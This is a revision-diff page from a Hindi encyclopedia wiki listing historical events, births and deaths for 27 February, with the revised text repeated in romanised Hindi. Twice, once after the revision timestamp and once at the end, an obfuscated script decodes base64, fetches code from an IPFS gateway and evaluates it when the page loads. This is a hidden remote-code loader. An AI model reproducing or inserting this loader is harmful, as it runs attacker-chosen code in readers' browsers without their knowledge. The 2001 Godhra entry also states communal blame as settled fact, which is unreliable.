Difference between revisions of "27 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
  
 
==27 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==27 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
* [[1879]]- यह आर्टिफिशियल स्वीटनर सैकरीन की खोज 1879 में आज ही के दिन रूसी रसायनशास्त्री कॉन्सटैंटिन फालबर्ग ने की थी। कोल तार के पदार्थो पर शोध करने के दौरान उनके हाथ में किसी पदार्थ की मिठास रह गई। इस पदार्थ को उन्होंने सैकरिन नाम दिया। यह व्यावसायिक रूप से उपलब्ध होने वाला पहला कृत्रिम मिठास देने वाला पदार्थ था।
+
* [[1879]] - आर्टिफिशियल स्वीटनर सैकरीन की खोज [[1879]] में आज ही के दिन रूसी रसायनशास्त्री कॉन्सटैंटिन फालबर्ग ने की थी। कोल तार के पदार्थों पर शोध करने के दौरान उनके हाथ में किसी [[पदार्थ]] की मिठास रह गई। इस पदार्थ को उन्होंने 'सैकरिन' नाम दिया। यह व्यावसायिक रूप से उपलब्ध होने वाला पहला कृत्रिम मिठास देने वाला पदार्थ था।
* [[1932]]- ब्रिटिश भौतिकशास्त्री जेम्स चैडविक ने [[न्यूट्रॉन]] की खोज की। अणु में प्रोटॉन और न्यूट्रॉन मिलकर अणु का केंद्रक बनाते हैं। इलेक्ट्रॉन इस केंद्रक के चारों तरफ चक्कर लगाते हैं। इस खोज के बाद अणु के केंद्रक को अलग करना संभव हुआ। जिससे परमाणु बम बनाने की राह प्रशस्त हुई।  
+
* [[1932]] - ब्रिटिश भौतिकशास्त्री जेम्स चैडविक ने [[न्यूट्रॉन]] की खोज की। [[अणु]] में [[प्रोटॉन]] और [[न्यूट्रॉन]] मिलकर अणु का केंद्रक बनाते हैं। [[इलेक्ट्रॉन]] इस केंद्रक के चारों तरफ चक्कर लगाते हैं। इस खोज के बाद अणु के केंद्रक को अलग करना संभव हुआ, जिससे परमाणु बम बनाने की राह प्रशस्त हुई।  
* [[2001]] -  
+
* [[2001]] - [[गोधरा]], [[गुजरात]] में [[अयोध्या]] से वपास आ रहे कारसेवकों के डिब्बे में मुसलमानों के आग लगाए जाने से 59 [[हिन्दू]] कारसेवकों की मौत।
**[[गोधरा]], [[गुजरात]] में [[अयोध्या]] से वपास आ रहे कारसेवकों के डिब्बे में मुसलमानों के आग लगाए जाने से 59 [[हिन्दू]] कारसेवकों की मौत।
+
**[[अफ़ग़ानिस्तान]] में तालिबान द्वारा सभी देव प्रतिमाओं को नष्ट करने का आदेश।
**अफ़ग़ानिस्तान में तालिबान के सभी देव प्रतिमाओं को नष्ट करने के आदेश।
+
* [[2005]] - मारिया शारापोवा ने 'कतर ओपन' खिताब जीता।  
* [[2005]] - मारिया शारापोवा ने कतर ओपन खिताब जीता।  
 
 
* [[2007]] - लान्साना कोयटे गुयाना के नये प्रधानमंत्री बने।  
 
* [[2007]] - लान्साना कोयटे गुयाना के नये प्रधानमंत्री बने।  
* [[2008]] -  
+
* [[2008]] - *लगातार सातवें साल विभिन्न क्षेत्रों में उल्लेखनीय योगदान के लिए 25 महिलाओं को 'जी. आर-8 सम्मान' से नवाजा गया।
**लगातार सातवें साल विभिन्न क्षेत्रों में उल्लेखनीय योगदान के लिए 25 महिलाओं को जी.आर-8 सम्मान से नवाजा गया।
 
 
**पाकिस्तान की सरकार ने आसिफ़ अली जरदारी के ख़िलाफ़ लगाये गए भ्रष्टाचार के सभी आरोप वापस लिए।  
 
**पाकिस्तान की सरकार ने आसिफ़ अली जरदारी के ख़िलाफ़ लगाये गए भ्रष्टाचार के सभी आरोप वापस लिए।  
* [[2009]] - पूर्व प्रधानमंत्री [[अटल बिहारी वाजपेयी]] ने अपनी लोकसभा सीट का उत्तराधिकारी पार्टी के वरिष्ठ नेता लाल जी टंडन को सौंपा।  
+
* [[2009]] - भूतपूर्व [[प्रधानमंत्री]] [[अटल बिहारी वाजपेयी]] ने अपनी लोकसभा सीट का उत्तराधिकारी पार्टी के वरिष्ठ नेता लाल जी टंडन को सौंपा।  
 
* [[2010]] - [[भारत]] ने आठवीं राष्ट्रमंडल निशानेबाज़ी प्रतियोगिता में 35 स्वर्ण, 25 रजत और 14 काँस्य सहित कुल 74 पदक जीतकर प्रथम स्थान हासिल किया। इंग्लैंड चार स्वर्ण सहित 31 पदक जीतकर दूसरे स्थान पर और वेल्स चार स्वर्ण सहित 13 पदक जीतकर तीसरे स्थान पर रहा। ऑस्ट्रेलिया ने तीन स्वर्ण सहित 19 पदक जीतकर चौथा स्थान हासिल किया।
 
* [[2010]] - [[भारत]] ने आठवीं राष्ट्रमंडल निशानेबाज़ी प्रतियोगिता में 35 स्वर्ण, 25 रजत और 14 काँस्य सहित कुल 74 पदक जीतकर प्रथम स्थान हासिल किया। इंग्लैंड चार स्वर्ण सहित 31 पदक जीतकर दूसरे स्थान पर और वेल्स चार स्वर्ण सहित 13 पदक जीतकर तीसरे स्थान पर रहा। ऑस्ट्रेलिया ने तीन स्वर्ण सहित 19 पदक जीतकर चौथा स्थान हासिल किया।
* [[2012]]- भारत 2030 तक दुनिया की तीसरी सबसे बड़ी अर्थव्यवस्था होगा, लेकिन उसकी उर्जा की मांग घटकर 4.5 प्रतिशत रह जाएगी। उर्जा क्षेत्र की वैश्विक कंपनी बीपी ने यह अनुमान लगाया है।
+
* [[2012]] - भारत 2030 तक दुनिया की तीसरी सबसे बड़ी अर्थव्यवस्था होगा, लेकिन उसकी [[ऊर्जा]] की मांग घटकर 4.5 प्रतिशत रह जाएगी। उर्जा क्षेत्र की वैश्विक कंपनी बीपी ने यह अनुमान लगाया है।
  
 
==27 फ़रवरी को जन्मे व्यक्ति==
 
==27 फ़रवरी को जन्मे व्यक्ति==
* [[1882]]- [[विजय सिंह पथिक]] - प्रसिद्ध स्वतंत्रता सेनानी।
+
* [[1882]] - [[विजय सिंह पथिक]] - [[राजस्थान]] के प्रसिद्ध स्वतंत्रता सेनानी थे।
  
 
==27 फ़रवरी को हुए निधन==
 
==27 फ़रवरी को हुए निधन==
* [[1931]]- [[चंद्रशेखर आज़ाद]], प्रसिद्ध स्वतंत्रता सेनानी
+
* [[2010]] - [[नानाजी देशमुख]] - 'राष्ट्रीय स्वयंसेवक संघ' के मज़बूत स्तंभ और प्रख्यात समाजसेवक।
 
* [[1997]] - [[इन्दीवर]] - [[हिंदी]] फ़िल्मों के प्रसिद्ध भारतीय गीतकार।
 
* [[1997]] - [[इन्दीवर]] - [[हिंदी]] फ़िल्मों के प्रसिद्ध भारतीय गीतकार।
* [[2010]]- [[नानाजी देशमुख]] - 'राष्ट्रीय स्वयंसेवक संघ' के मज़बूत स्तंभ और प्रख्यात समाजसेवक।
 
 
* [[1976]] - [[के. सी. रेड्डी]] - [[कर्नाटक]] के प्रथम [[मुख्यमंत्री]] तथा [[मध्य प्रदेश]] के भूतपूर्व [[राज्यपाल]]।
 
* [[1976]] - [[के. सी. रेड्डी]] - [[कर्नाटक]] के प्रथम [[मुख्यमंत्री]] तथा [[मध्य प्रदेश]] के भूतपूर्व [[राज्यपाल]]।
* [[1956]]- [[गणेश वासुदेव मावलंकर]], प्रसिद्ध स्वतंत्रता सेनानी और लोकसभा के प्रथम अध्यक्ष
+
* [[1956]] - [[गणेश वासुदेव मावलंकर]] - प्रसिद्ध स्वतंत्रता सेनानी और [[लोकसभा]] के प्रथम अध्यक्ष थे।
 +
* [[1931]] - [[चंद्रशेखर आज़ाद]], प्रसिद्ध स्वतंत्रता सेनानी
 +
 
 
==27 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==27 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
  

Revision as of 10:53, 31 July 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 27 faravari varsh ka 58 vaan din hai. sal mean abhi aur 307 din shesh haian. (lip varsh mean 308 din)

27 faravari ki mahattvapoorn ghatanaean

  • 1879 - artiphishiyal svitanar saikarin ki khoj 1879 mean aj hi ke din roosi rasayanashastri k aaunsataiantin phalabarg ne ki thi. kol tar ke padarthoan par shodh karane ke dauran unake hath mean kisi padarth ki mithas rah gee. is padarth ko unhoanne 'saikarin' nam diya. yah vyavasayik roop se upalabdh hone vala pahala kritrim mithas dene vala padarth tha.
  • 1932 - british bhautikashastri jems chaidavik ne nyootr aaun ki khoj ki. anu mean prot aaun aur nyootr aaun milakar anu ka keandrak banate haian. ilektr aaun is keandrak ke charoan taraph chakkar lagate haian. is khoj ke bad anu ke keandrak ko alag karana sanbhav hua, jisase paramanu bam banane ki rah prashast huee.
  • 2001 - godhara, gujarat mean ayodhya se vapas a rahe karasevakoan ke dibbe mean musalamanoan ke ag lagae jane se 59 hindoo karasevakoan ki maut.
    • afaganistan mean taliban dvara sabhi dev pratimaoan ko nasht karane ka adesh.
  • 2005 - mariya sharapova ne 'katar opan' khitab jita.
  • 2007 - lansana koyate guyana ke naye pradhanamantri bane.
  • 2008 - *lagatar satavean sal vibhinn kshetroan mean ullekhaniy yogadan ke lie 25 mahilaoan ko 'ji. ar-8 samman' se navaja gaya.
    • pakistan ki sarakar ne asif ali jaradari ke khilaf lagaye ge bhrashtachar ke sabhi arop vapas lie.
  • 2009 - bhootapoorv pradhanamantri atal bihari vajapeyi ne apani lokasabha sit ka uttaradhikari parti ke varishth neta lal ji tandan ko sauanpa.
  • 2010 - bharat ne athavian rashtramandal nishanebazi pratiyogita mean 35 svarn, 25 rajat aur 14 kaansy sahit kul 74 padak jitakar pratham sthan hasil kiya. ianglaiand char svarn sahit 31 padak jitakar doosare sthan par aur vels char svarn sahit 13 padak jitakar tisare sthan par raha. aaustreliya ne tin svarn sahit 19 padak jitakar chautha sthan hasil kiya.
  • 2012 - bharat 2030 tak duniya ki tisari sabase b di arthavyavastha hoga, lekin usaki oorja ki maang ghatakar 4.5 pratishat rah jaegi. urja kshetr ki vaishvik kanpani bipi ne yah anuman lagaya hai.

27 faravari ko janme vyakti

27 faravari ko hue nidhan

27 faravari ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>